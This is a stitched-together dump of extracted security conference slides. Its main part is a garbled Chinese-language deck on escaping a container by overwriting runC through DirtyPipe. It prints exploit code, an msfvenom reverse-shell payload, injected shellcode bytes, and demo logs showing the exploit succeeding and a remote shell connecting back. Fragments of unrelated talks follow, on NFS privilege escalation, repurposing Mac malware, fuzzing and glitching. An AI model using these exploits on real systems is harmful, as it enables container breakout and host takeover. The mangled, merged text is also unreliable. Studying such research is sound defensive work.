=open(\"/proc/self/exe\",O_RDONLY);\nlseek(runc_fd_read,ELF_ENTRYPOINT_OFFSET,SEEK_SET);\nnbytes =read(runc_fd_read,&entrypoint,sizeof(entrypoint));\n//msfvenom -plinux/x64/shell_reverse_tcp LHOST=1.1.1.1LPORT=4444-fraw|xxd -i\ncharpayload[]={\n0x6a,0x29,0x58,0x99,0x6a,0x02,0x5f,0x6a,0x01,0x5e,0x0f,0x05,\n/*payload */\n};\nwrite_with_dirtypipe(runc_fd_read,entrypoint,payload,payload_len);\nELF\nELF\nDirtyPipe\nCVE-2022-0185runC\nUAFPipe Buffer Flag\n->Dirtypipe\n->DirtypiperunC\n->\nØ \nØ payload\nØ runC\nØ runCDirtyPipe\n探索更优雅的利用手法\n04\nELFELF\n➜ file`whichrunc`\n/usr/local/sbin/runc:ELF 64-bitLSBexecutable,x86-64,version1(SYSV),\nstaticallylinked,BuildID[sha1]=0afa4292e5163007028fbde6effb1a2edc1a3f49,forGNU/Linux3.2.0,stripped\n➜ xxd `whichrunc`|head-n1\n00000000:7f454c46020101000000000000000000.ELF............\nsrc: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format#/media/File:Elf-layout--en.svg\nELF\n➜ ~objdump -dj '.text'`whichrunc`|sed-n'13,24p'\n0000000000232390<_start@@Base>:\n232390:\n31ed\nxor\n%ebp,%ebp\n232392:\n4989d1 mov%rdx,%r9\n232395:\n5e\npop%rsi\n232396:\n4889e2 mov%rsp,%rdx\n232399:\n4883e4f0 and$0xfffffffffffffff0,%rsp\n23239d:\n50\npush%rax\n23239e:\n54\npush%rsp\n23239f:\n4c8d056ac24600\nlea0x46c26a(%rip),%r8\n2323a6:\n488d0df3c14600\nlea0x46c1f3(%rip),%rcx\n2323ad:\n488d3d8cb40600\nlea0x6b48c(%rip),%rdi\n2323b4:\nff15167ca800\ncallq *0xa87c16(%rip)\n➜ ~cat/proc/sys/kernel/randomize_va_space\n2\n➜ ~readelf -h`whichrunc`|sed-n'1,3p;8p;11p'\nELFHeader:\nMagic:7f454c46020101000000000000000000\nClass:ELF64\nType:DYN(Sharedobjectfile)\nEntrypointaddress:0x232390\n①\n②\n1.runCPIEASLR\n2.DirtyPipeELFpayload\n1.呢模payloadEntrypointOEP\n1.runCPIE\n2.社OEP\n3.payloadOEP\n2.payload\n1.padding\n2.section(s)\n➜ ~readelf --wide--section-headers`whichrunc`|sed-n'4,9p'\n[Nr]NameTypeAddressOffSizeESFlg LkInfAl\n[0]NULL000000000000000000000000000000000\n[1].interp\nPROGBITS000000000000027000027000001c00A001\n[2].note.ABI-tag\nNOTE\n000000000000028c 00028c00002000A004\n[3].note.go.buildid NOTE\n00000000000002ac0002ac00006400A004\n[4].note.gnu.build-id NOTE\n000000000000031000031000002400A004\n➜ ~readelf --wide--program-headers`whichrunc`|sed-n'7p;12,14p'\nTypeOffsetVirtAddr\nPhysAddr\nFileSiz MemSiz Flg Align\nNOTE\n0x00028c 0x000000000000028c0x000000000000028c0x0000a80x0000a8 R0x4\n157\nbytes\nrunCver:1.0.3\nrunC\n➜ ./runc_latest -v\nrunc version1.1.1\ncommit:v1.1.0-20-g52de29d7\nspec:1.0.2-dev\ngo:go1.17.6\nlibseccomp:2.5.3\n➜ readelf --wide--program-headers./runc_latest |sed-n'7,15p'\nTypeOffsetVirtAddr\nPhysAddr\nFileSiz MemSiz Flg Align\nLOAD0x0000000x00000000004000000x00000000004000000x0004e80x0004e8R0x1000\nLOAD0x0010000x00000000004010000x00000000004010000x46e0e10x46e0e1RE0x1000\nLOAD0x4700000x00000000008700000x00000000008700000x4562e20x4562e2R0x1000\nLOAD0x8c68a80x0000000000cc78a80x0000000000cc78a80x0336c80x071948RW0x1000\nNOTE0x0002000x00000000004002000x00000000004002000x0000440x000044R0x4\nTLS0x8c68a80x0000000000cc78a80x0000000000cc78a80x0000280x000078R0x8\nGNU_STACK0x0000000x00000000000000000x00000000000000000x0000000x000000RW0x10\nGNU_RELRO0x8c68a80x0000000000cc78a80x0000000000cc78a80x0037580x003758R0x1\nrunC NOTE68\nrunC\n➜ readelf --wide--section-headers./runc_latest 2>/dev/null|sed-n'4p;6,7p;29,30p'\n[Nr]NameTypeAddressOffSizeESFlg LkInfAl\n[1].note.gnu.build-idNOTE000000000040020000020000002400A004\n[2].note.ABI-tagNOTE000000000040022400022400002000A004\n[24].go.buildinfo\nPROGBITS0000000000cdfd508ded5000002000WA0016\n[25].noptrdata\nPROGBITS0000000000cdfd808ded8001a960 00WA0032\n008DED50FF20476F206275696C64696E663A0800.Gobuildinf:..\n008DED6050C0CC0000000000A0C0CC0000000000P...............\n008DED7000000000000000000000000000000000................\n008DED80052F0A3E203A010101010A7C04050103./.>:.....|....\n008DED903C612E2F2F005C275C225C5C01020300<a.//.\\'\\\"\\\\....\n008DEDA03C703E003C7464003C7468003C683100<p>.<td.<th.<h1.\n008DEDB03C6832003C6833003C6834003C683500<h2.<h3.<h4.<h5.\n008DEDC03C6836002E2E2F00EFBFBD006E756C6C<h6.../.....null\n008DEDD000060C1200060C123C74743E3C2F613E........<tt></a>\n008DEDE0266C743B3C2F703E3C68723E3C756C3E<</p><hr><ul>\n008DEDF03C6F6C3E2667743B3C646C3E3C6C693E<ol>><dl><li>\n008DEE003C64643E3C64743E3C74723E3C62723E <dd><dt><tr><br>\n008DEE103C656D3EFFFFFFFFFFFFFFFF01000000<em>............\n008DEE20FFFFFFFF08000000FFFFFFFF01000000 ................\n008DEE3008000000010000002D2D2D0A266C743B ........---.<\n008DEE402667743B5C75303026616D703B000000 >\\u00&...\n008DEE503C64656C3E0000003C2F74743E000000<del>...</tt>...\n008DEE603C7072653E0000003C2F756C3E000000<pre>...</ul>...\n008DEE703C2F6F6C3E0000003C2F646C3E000000</ol>...</dl>...\n008DEE803C2F6C693E0000003C2F64643E000000</li>...</dd>...\n008DEE903C2F64743E0000003C2F74643E000000 </dt>...</td>...\n008DEEA03C2F74683E0000003C2F74723E000000</th>...</tr>...\n008DEEB03C2F68313E0000003C2F68323E000000</h1>...</h2>...\n008DEEC03C2F68333E0000003C2F68343E000000 </h3>...</h4>...\n--- runc\n--0x8DEEC0/0x8FA980-------------------------------------\n008DED50 505152565741534831C04883C0390F05\n008DED60 83F8007420B8F01B4000488D1D000000\n008DED70 00904881EB710D80004801C3415B5F5E\n008DED80 5A595853C3554889E54831D26A015E6A\n008DED90 025F6A29580F054883EC08C704240200\n008DEDA0 115CC7442404C0A80066488D34244883\n008DEDB0 C4085B4831DB6A105A6A035F6A2A580F\n008DEDC0 054831F6B0210F0548FFC64883FE027E\n008DEDD0 F34831C04831F648BF2F2F62696E2F73\n008DEDE0 6856574889E74831D2B03B0F05756C3E\n008DEDF03C6F6C3E2667743B3C646C3E3C6C693E\n008DEE003C64643E3C64743E3C74723E3C62723E\n008DEE103C656D3EFFFFFFFFFFFFFFFF01000000\n008DEE20FFFFFFFF08000000FFFFFFFF01000000\n008DEE3008000000010000002D2D2D0A266C743B\n008DEE402667743B5C75303026616D703B000000\n008DEE503C64656C3E0000003C2F74743E000000\n008DEE603C7072653E0000003C2F756C3E000000\n008DEE703C2F6F6C3E0000003C2F646C3E000000\n008DEE803C2F6C693E0000003C2F64643E000000\n008DEE903C2F64743E0000003C2F74643E000000\n008DEEA03C2F74683E0000003C2F74723E000000\n008DEEB03C2F68313E0000003C2F68323E000000\n008DEEC03C2F68333E0000003C2F68343E000000\n--- runc\n--0x8DEEC0/0x8FA980--------------------------\nDEMO 1 exec\n➜ ~dockerrun--rm-v`pwd`/exp:/exp-it--nameescapeubuntu:18.04/bin/bash\nroot@60adb7f4b502:/#cd/exp;./escape_with_dirtypipe_exec\n[*]exploitingDirtyPipe (CVE-2022-0847)\n[*] waitingforrunC tobeexecutedinthecontainer\n[+]runC catched:/proc/353/exe\n[+]originalentrypoint:0x401bf0\n[+]OEPinpayloadupdated\n[+] remoteIPandportinpayloadupdated\n[*]parsingrunC ELF\n[+]PT_NOTEsegment4found\n[+]section.go.buildinfo found\n[*]inject->offmod4096=0xd50\n[*]inject->secaddr mod4096=0x0\n[+]inject->secaddr +=0xd50\n[+] nop virtualaddr inpayloadupdatedto0x800d71\n[*] writingpayloadintorunC withdirtypipe\n[+]157bytespayloadinjectedat0x8ded50offsettotargetfile\n[*]updatingsectionheaderwithdirtypipe\n[+]section.go.buildinfo found\n[+]sectionheaderupdated\n[*]updatingsegmentheaderwithdirtypipe\n[+]segmentheaderupdated\n[*]updatingentrypoint to0x800d50withdirtypipe\n[+]exploitsucceeded\n➜ ~ncat -klvnp 4444\nNcat:Version7.91(https://nmap.org/ncat )\nNcat:Listeningon:::4444\nNcat:Listeningon0.0.0.0:4444\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:53425.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:53427.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:53428.\ncat/etc/passwd|grepvagrant\nvagrant:x:1000:1000:,,,:/home/vagrant:/usr/bin/zsh\n➜ ~dockerexec-itescape/exp/bash_evil\nERRO[0000]Nohelptopicfor'/exp/bash_evil'\n➜ ~dockerrun--rm-itubuntu:18.04hostname\nd2d8b123f631\ndockerexec盟告runC\nshell\nDEMO 2 \n➜ ~dockerrundirtypipe:escape\n[*]exploitingDirtyPipe (CVE-2022-0847)\n[+]runC openedforreadingas/proc/self/fd/3\n[+]executing/escape_with_dirtypipe_image\n[+]originalentrypoint:0x232390\n[+]OEPinpayloadupdated\n[+] remoteIPandportinpayloadupdated\n[*]parsingrunC ELF\n[+]PT_NOTE segment5found\n[+]section.go.buildinfo found\n[*]inject->offmod4096=0x3b0\n[*]inject->secaddr mod4096=0x0\n[+]inject->secaddr +=0x3b0\n[+] nop virtualaddr inpayloadupdatedto0x8003d1\n[*]writingpayloadintorunC withdirtypipe\n[+]157bytespayloadinjectedat0xacd3b0offsettotargetfile\n[*]updatingsectionheaderwithdirtypipe\n[+]section.go.buildinfo found\n[+]sectionheaderupdated\n[*] updatingsegmentheaderwithdirtypipe\n[+]segmentheaderupdated\n[*] updatingentrypoint to0x8003b0withdirtypipe\n[+]exploitsucceeded\n➜ ~ncat -klvnp 4444\nNcat:Version7.91(https://nmap.org/ncat )\nNcat:Listeningon:::4444\nNcat:Listeningon0.0.0.0:4444\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:54172.\ncat/etc/passwd|grepvagrant\nvagrant:x:1000:1000:,,,:/home/vagrant:/usr/bin/zsh\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:55044.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:55045.\nNcat:Connectionfrom192.168.0.102.\nNcat:Connectionfrom192.168.0.102:55046.\n➜ dirtypipe dockerrun--rm-itubuntu:18.04hostname\nd5e509321515a\ndockerexecrunC\nshell\nshell\n__attribute__((constructor))voidrun_at_link(void) {\nintrunc_fd_read =open(\"/proc/self/exe\",O_RDONLY);\n}\nlibseccomp\n①\nØ \nØ runC\nØ 👉\nØ runC\nØ CVE-2019-5736\nØ DirtyPipeCVE-2022-0185\nØ \n路在何方\n05\nTakeaways\nØ \nØ +\nØ rootless\nØ &runC\nØ &\nØ https://veritas501.github.io/2022_03_16-CVE_2022_0185pipe\nØ https://terenceli.github.io//2022/03/19/container-escape-through-dirtypipe\nØ https://dirtypipe.cm4all.com\nØ https://github.com/opencontainers/runc/commit/0a8e4117e7f715d5fbeef398405813ce8e88558b\nØ https://github.com/opencontainers/runc/commit/16612d74de5f84977e50a9c8ead7f0e9e13b8628\nØ https://github.com/opencontainers/runc/commit/50a19c6ff828c58e5dab13830bd3dacde268afe5\nØ https://github.com/lxc/lxc/commit/6400238d08cdf1ca20d49bafb85f4e224348bf9d\nØ https://github.com/DataDog/dirtypipe-container-breakout-poc\nØ https://unit42.paloaltonetworks.com/breaking-docker-via-runc-explaining-cve-2019-5736/\nØ https://github.com/advisories/GHSA-gp4j-w3vj-7299\nØ https://bugzilla.suse.com/show_bug.cgi?id=1012568#c6\nØ https://seclists.org/oss-sec/2019/q1/119\nØ PracticalBinaryAnalysisbyDennisAndriesse" | pdf |
2020/9/25
Linux提权姿势二:利用NFS提权
https://mp.weixin.qq.com/s?__biz=MzU4NTY4MDEzMw==&tempkey=MTA4MF95ZVZHaittcHd5aEVSN0dCcmZLUkk1ekhBRi1Sb2JicDBqQ20tU…
1/6
Linux提权姿势二:利用NFS提权
如果在服务器上具有低特权shell,并且发现服务器中具有NFS共享,则可以使用它来升级特权。但是成功
取决于它的配置方式。
目录
什么是NFS?
网络文件系统(NFS)是一个客户端/服务器应用程序,它使计算机用户可以查看和选择存储和更新远程
计算机上的文件,就像它们位于用户自己的计算机上一样。在 N... | pdf |
Harnessing Weapons
...of Mac Destruction
WHOIS
@patrickwardle
repurposing
!detection
detection
OUTLINE
the idea
The Idea
"good hackers copy; great hackers steal"
spy "a"
the "lab"
}
captured!
(by spy "b")
REPURPOSING MALWARE
...for personal gain
spy "b"
"repurposed"
...rather why not!
WHY?
With more resources an... | pdf |
HITCON 2013 : CYBERWAR, IN HACK WE TRUST
JUL. 19-20, 2013
How can I have 100 0-day for just 1-day
Version : Draft
Speak by R3d4l3rt
1
HITCON 2013
Introduction
I.
How can I found bug easily?
III.
Project Overview
II.
How can I have about one hundred vulnerability for just 1 days
IV.
Outline
•
Introduction of speaker
•
... | pdf |
A Journey Into Fuzzing
WebAssembly Virtual Machines
Patrick Ventuzelo
#BHUSA @BlackHatEvents
#BHUSA @BlackHatEvents
Patrick Ventuzelo (@Pat_Ventuzelo)
●
Founder & CEO of FuzzingLabs | Senior Security Researcher
○
Fuzzing and vulnerability research
○
Development of security tools
●
Training/Online courses
○
Rust Sec... | pdf |
Gotta
glitch
‘em all!
10+ Years of War Stories
Glitching Embedded Devices
AGENDA
Introduction
FI in the wild
Practical FI
Protections
Where is the problem?
const char *PIN = "19379148"
// Compare the PIN with the correct one
// Return true if different
bool comparePIN(char *pin) {
for (int i=0; i<strle... | pdf |
你也配用计划任务?
高级攻防实验室 老草
前言
标题微软雅黑20号字
01
PART
前言
• 这是一篇老草的自我反思
• 核心技术点:TaskScheduler(Windows)
• 关联知识点:RPC/IDL/COM/UAC/横向移动/武器化
• 请勿对号入座
你也配用计划任务API?
标题微软雅黑20号字
02
PART
你也配用计划任务API?
• 正常的计划任务用法
• 抄自msdn
• 按顺序十个以上必要调用
你也配用计划任务API?
• 本质呢?
你也配用计划任务API?
• 抓个包?
你也配用计划任务API?
• 理论依据呢?
• MS-TSCH
你也配用计划任务API?
• 披着COM/DCOM皮的纯RPC
• 本... | pdf |
The future frontier of Hacking - UMTS mobile phone platform
Web intrusions: the best indicator of the vulnerable status of the Internet
Speaker: SyS64738 www.zone-h.org
Zone-H.org
Zone-H.org
Zone-H.org: the Internet thermometer?
Zone-H.org
SECURE
HACKABLE
F#CKABLE
Digital attacks amount since 2002
1600
1811 2341
365... | pdf |
Raspberry MoCA
A recipe for compromise
Your Presenter
Andrew Hunt
Graduate student at George Mason University
ahunt5@masonlive.gmu.edu
The views presented in this talk do not reflect
the views of my employer. It is an independent
work.
Media over Coaxial Alliance
• A bunch of media companies got together
• H... | pdf |
Bypass LSA Protection
0x01 LSA Protection
1LSA & LSASS
LSASS (Local Security Authority Subsystem Service
Windows
LSA (Local Security Authority
Lsass
2LSA Protection
Win8.1 LSA
Lsa Protection mimikatz
LSA Microsoft LSA
0x02 LSA Protection & Bypass
1 LSA Protection
RunAsPPL 1 Lsass LSA Protection
Lsa I... | pdf |
Bypass firewalls, application
white lists, secure remote
desktops in 20 seconds
Zoltan Balazs
DEF CON 22, 2014
Hungary
root@bt:~# whoami
Zoltán Balázs
root@bt:~# whoami
root@bt:~# whoami
AV testing
AV bypass
root@bt:~# whoami
OSCP: Occasional Satire Captain Punk
CISSP: Certified Interspecie-ial Sheep Shearing Profess... | pdf |
© Caendra Inc. 2020
All Rights Reserved
Web Application
Penetration Testing
eXtreme
/*<EVASION>*/
S e c t i o n 0 1 | M o d u l e 0 2
WAPTXv2: Section 01, Module 02 - Caendra Inc. © 2020
Table of Contents
MODULE 02 | /*<EVASION>*/
2.1 Base64 Encoding Evasion
2.2 URI Obfuscation Techniques
2.3 JavaScript Obfuscati... | pdf |
Google Toolbar:
The NARC Within
“The” Google
What would we do
without them/it?
Google Toolbar:
The NARC Within
The problem:
URLS are the
geek tool?
URLs, URLs
everywhere...
Home, work,
on the go?
Google Toolbar:
The NARC Within
Google Toolbar is the
Solution?
Google Toolbar:
The NARC Within
Or just a tease?
G... | pdf |
Are We Really Safe?
HACKING ACCESS CONTROL SYSTEMS
Dennis Maldonado
u Security Consultant @ KLC Consulting
u Twitter: @DennisMald
u Houston Locksport Co-founder
http://www.meetup.com/Houston-Locksport/
u Rebooting HAHA! (Houston Area Hackers Anonymous)
Agenda
u Physical Access Control System
u Lin... | pdf |
We are “into” helping others
reach the security summit…
Andrew Gavin : Verizon Business
Michael Baucom : N2 Net Security, Inc
Charles Smith : N2 Net Security, Inc
Brief recap of OpenDLP
Goals of new Meterpreter feature
Decisions behind using OpenDLP and
Metasploit
Architecture and changes
Architecture and change... | pdf |
張善政 S-C (Simon) Chang
行政院副院長 Vice Premier
Aug. 26th, 2015
Reinforcing Cyber Security
-- Taiwan’s Roadmap
Reinforcing Cyber Security
-- Taiwan’s Roadmap
Build a comprehensive defense posture
Government wide classification and security
requirements
Establish 8 CIP domains and security requirements
PP... | pdf |
PSRC小目标,挣他一个亿
讲师:carry_your
138,270,000
CONTENTS
01
资产收集技巧
02
漏洞挖掘案例
03
职业规划梳理
资产收集
1
在渗透测试中,我们需要尽可能多
的去收集目标的信息,资产探测和
信息收集,决定了你发现安全漏洞
的几率有多大。如何最大化的去收
集目标范围,尽可能的收集到子域
名及相关域名的信息,这对我们进
一步的渗透测试显得尤为重要。
基本概况
IP段+端
口
域名
APP
服务号
API
信息泄露
社工
基本概况
股权结构查询
大型金融集团往往有着非常复
杂的股权结构,通过工商查询
目标集团的股权结构,更全面
的了解目标集团的公司资产,
从一个点切入可获取到集团所
有的子公司... | pdf |
CVE-2022-33891: Apache Spark shell
command injection vulnerability via Spark
UI
影响版本
Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.
分析
⾸先看到官⽅描述
https://lists.apache.org/thread/p847l3kopoo5bjtmxrcwk21xp6tjxqlc
当中可以根据提⽰找到diff:
https://github.com/apache/spark/pull/36315/file... | pdf |
HACKING TRAFFIC LIGHTS
DEFCON 2020
WHO ARE WE?
06/08/2020
HACKING TRAFFIC LIGHTS
• Wesley Neelen
• Hacker
• OSCP / OSCE
• 8+ years of experience
• Internet of Things security
• Rik van Duijn
• Hacker
• OSCP / OSCE
• 8+ years of experience
• Malware analysis
DISCLAIMER: NO SMART TRAFFIC EXPERTS ☺. WE DO USE BICYCLES
@W... | pdf |
#BHUSA @BlackHatEvents
PISE: Automatic Protocol Reverse Engineering
Ron Marcovich, Orna Grumberg and Gabi Nakibly
#BHUSA @BlackHatEvents
Ron Marcovich
M.Sc. Student
Introductions
Dr. Gabi Nakibly
Senior Adjunct
Lecturer
Distinguished
Researcher
Formerly at
Prof. Orna Grumberg
Faculty Member
#BHUSA @BlackHatEvents
Age... | pdf |
• Twitter: @Kevin2600
• Github: https://github.com/kevin2600
• 狗汪汪系列: 玩转无线电-不安全的蓝牙锁; 玩转嵌入式-I2C 协议分析; 玩转嵌入式-WINKHUB 边信道;
玩转无线电-GPS Hacking; 玩转无线电-温哥华天车 RFID 票务系统 ...
议程:
• 无人机攻防那点事
• 无人机攻防案例篇
• 无人机攻防实战篇
• 无人机攻防科幻篇
无人机攻防那点事
无人机世界百家齐放
• 无人机厂商众多 (DJI; Parrot; Xiaomi; DIYer...)
• 无人机运用场景广泛 (航拍; 运输; 求婚; 应急反应...)
• 无人机遥控种... | pdf |
Alexander Lash
Outline
Disclaimers
Why I Do This
Basic Skills
“Feature” -phones
Light Modification
Heavy Modification
Smartphones
BlackBerry
Symbian
Windows Mobile
iPhone
This Talk is NOT
…an endorsement
…a detailed guide
…about a particular phone
…except when it is.
…about carriers
…o... | pdf |
Aggressor.main
进入相关认证工
作
cs.jar 开始运行
输出相关错误,比
如缺少验证正数等
错误
错误
成功启动相关
UI
new Authorization()
开始认证
开始认证
退出程序
readFile("cobaltstrike.auth")
将数据代入 _decrypt() 进行
RSA 解密,此处使用公钥解
密
将返回的
将返回的 byte[] 步入
步入 AuthCrypto.derypt()
将公钥文件进行解
析,并计算 MD5 与指
定值进行对比
load() -> readAll("authpub.key")
new AuthCrypto()
cipher
生成
生成
pubkey
生成
... | pdf |
The Agricultural
Data Arms Race:
Exploiting a Tractor Load
of Vulnerabilities In The
Global Food Supply Chain.
(in good faith)
A man, “Using a
hand tractor for
cultivation.
Falls City
Farmsteads,
Nebraska”
Rothstein,
Arthur, 1915-
1985,
photographer
(Public Domain)
John Deere 7450
ProDrive Forage
Harvester... | pdf |
Who Controls the Past
Controls the Future
Who Controls the Present
Controls the Past
Nothing gives rest but the
sincere search for truth.
-Pascal
Greetz
from Room 101
Kenneth Geers
1984
# Nineteen Eighty-Four (Orwell)
# Govt IW vs own populace
# Ministry of Truth, Thought Police
# Two-way telescreens
# Room 101
# C... | pdf |
A Journey To
Protect Points
Of Sale
Nir Valtman, CISSP
W : www.valtman.org
. : @ValtmaNir
Introduction
2
Photo by Bill Fraser
01/07/2014
3
01/07/2014
4
I’m an architect
5
01/07/2014
6
7
Zombies!!!
8
Defacement
9
AntiDef
OPEN SOURCE
Memory Scraper
Secure TDD
10
Why Points Of Sale
Targeted?
11
12
13
Deployment
14
15
... | pdf |
WriteUp By Nu1L
Author:Nu1L
WriteUp By Nu1L
PWN
Honorbook
Reverse
print
mips
pypy
WEB
babyphp
Crypto
RRSSAA
combinelfsr
rw
aes_baby
PWN
Honorbook
risc-vpwnghidra
addoff-by-one
0x300xf0,overlap
from pwn import *
s = remote("121.36.192.114","9999")
# s = process("./qemu-riscv64 -g 1234 -L ./libs ./honorbook",shell=True)... | pdf |
Finding 0days in Enterprise Software
Shubham Shah
Hacking HCL Digital Experience also
known as IBM Websphere Portal
What is HCL Digital Experience / IBM Websphere
Portal
• Enterprise content management system.
• Used by medium - large enterprises, and is a very flexible content delivery
application.
• Around 4.5k ... | pdf |
Bug Bounty 獎金獵人甘苦談
那些年我回報過的漏洞
orange@chroot.org
#Orange Tsai
#CHROOT #DEVCORE
#電競選手 #CTFer
#Web
#汪
My RCE Checklists
√ Facebook
√ Apple
√ Yahoo
√ Uber
? Google
什麼是 Bug Bounty Program ?
• 在官方所提供的規則及範圍下, 讓獨立的研究人員可自由尋找系
統漏洞, 並提供對等的獎勵
小禮物
獎金
名譽(Hall of Fame)
Bug Bounty 好處?
防止漏洞流入地下市場
架構大難顧及網路邊界
企業對外形象宣傳
改善社會不良風氣
How do y... | pdf |
LCTF-Writeup
by Nu1L
Web
L PLAYGROUND
djdemourlssrffuzz6379
redis
nginx/static../
pycflagsessiondata
sessionidsessiondataflag
linux0fuzz0:8000CRLF
redisseturlvps302sessiondata
append
Simple blog
swpivcbcsprintf
http://211.159.161.162/test.php?
submit=%E6%8F%90%E4%BA%A4&site=file%3A%2F%2Fwww.baidu.com%2F/home/lctf/flag%23
w... | pdf |
#BHUSA @BlackHatEvents
BrokenMesh: New Attack
Surfaces of Bluetooth Mesh
Han Yan, Lewei Qu, Dongxiang Ke
Baidu AIoT Security Team
#BHUSA @BlackHatEvents
Information Classification: General
About US
Baidu AIoT Security Team
• Focus on Android / Linux platform
• Aim to discover 0day vulnerability and explore possible def... | pdf |
Bypassing Android
Password Manager Apps
Without Root
Stephan Huber, Siegfried Rasthofer, Steven Arzt
Fraunhofer SIT
2
3
Stephan
•
Mobile Security Researcher at
Fraunhofer SIT
•
Enjoys teaching students in
Android (app) hacking
•
Twitter: @teamsik
Siegfried
•
Head of Department Secure
Software Engineering at Fraunh... | pdf |
pwn-
ctfwikihttps://wiki.x10sec.org/pwn/linux/user-mode/stackoverflow/x86/stack-intro/
ctfwikictfwiki
32
sudo apt-get install lib32z1 lib32ncurses5
unbuntu20lib32z1
1. = EBPRBP - + 48
2. callcallmv ebp+0x8
x86x64
3. 232
1n
gdbpwntools
socatpwn
socat tcp-l:6666,fork exec:../ret2syscall,reuseaddr
6666
py
gdb.attach(p... | pdf |
1
CVE-OLON-OOOLS Gitlab 前台RCE 分析之 P。
接 https://t.zsxq.com/aYZzVbu
公众号: https://mp.weixin.qq.com/s?
__biz=Mzg4NzcxMDgyOA==&mid=2247483654&idx=1&sn=8c0f99c646e63460d3190508613cac4
5&chksm=cf877405f8f0fd1382100c97af86db549084b987c515c848eb8a7faa92eaac7b5aeb0ac9
2ece#rd
==================================================... | pdf |
1
种新型Java句话⽊⻢的实现
前⾔
基本原理
获取脚本引擎
绑定对象
eval
基本语法
调⽤Java⽅法
导⼊Java类型
创建Java类型的数组
导⼊Java类
⽅法调⽤与重载
Payload结构设计
语法问题的坑
两种语⾔对象间的相互转换
Rhino/Nashorn解析的差异
反射的坑
保底操作
测试
最后
@yzddMr6
⼀直以来,Java⼀句话⽊⻢都是采⽤打⼊字节码defineClass实现的。这种⽅法的优势是可以完整的打
进去⼀个类,可以⼏乎实现Java上的所有功能。不⾜之处就是Payload过于巨⼤,并且不像脚本语⾔⼀
样⽅便修改。并且还存在很多特征,例如继承ClassLoader,反射调⽤defineClass... | pdf |
F.O.E.
Feed Over Email
A Proxy-less RSS Reader
A Proxy-less RSS Reader
http://code.google.com/p/foe-project
By
Sho Ho
Broadcasting Board of Governors
F.O.E.
Who am I?
Name:
Sho Ho
Job Title:
Software Engineer
Employer: Broadcasting Board of Governors
Mother ship of Voice of America, Radio Free Europe/Radio
Liberty, ... | pdf |
The Hackers Guide to
The Hackers Guide to
Search and Arrest
Search and Arrest
by Steve Dunker J.D.
by Steve Dunker J.D.
I. When Can an Officer Legally
I. When Can an Officer Legally
““Stop
Stop”” an individual?
an individual?
A. Voluntary Stops
A. Voluntary Stops
B. Investigative Stops
B. Investigative Stops
... | pdf |
“WMAP: Metasploit goes Web”
ET
Introduction
• No agenda in this presentation
• No Sun Wu Tzu “The Art of War” Stuff In
this presentation either.
– #nomorefree-art-of-war-stuff-in-security-
presentations.
• No history of web scanners
Introduction
• Efrain Torres
– 2*5+ years enjoying IT
security
– Metasploit team
– ... | pdf |
java urlconnection
nat smashjava urlconnectionurl
12
ssrf302locationurl
ssrf302
get ssrfapachenginx
ssrfwhite spaceapachenginx
nginx
https://t.zsxq.com/m6YjqnE
apache
https://t.zsxq.com/Mz7A2Nz | pdf |
Stealing The Internet
An Internet-Scale
Man In The Middle Attack
Defcon 16, Las Vegas, NV - August 10th,
2008
Alex Pilosov – Pure Science
Chairman of IP Hijacking BOF
ex-moderator of NANOG mailing list
alex@pilosoft.com
Tony Kapela – Public Speaking Skills
CIO of IP Hijacking BOF
tk@5ninesdata.com
Why Should You Car... | pdf |
1
保护应用程序和 API 销售演练:检查清单
Web 应用程序和 API 保护功能检查清单
在规划、实施或优化信息安全策略的同时部署 Web 应用程序和 API 安全解决方案,让您的企业获得理解独有风
险、识别安全漏洞和检测威胁的强大能力。您需要的是这样一种 Web 应用程序和 API 保护 (WAAP) 解决方案 -
它能够提供持续的监测能力和综合全面的见解,还具有识别和阻止大部分复杂攻击的全面能力。
这份检查清单可用于评估供应商能力,也可以用作实施有效的 WAAP 解决方案时需要满足的需求列表。
类别 1:平台需求
企业的类型和规模林林总总,并且具有不同水平的需求。您的 Web 应用程序安全解决方案应该灵活、
可扩展,并且易... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.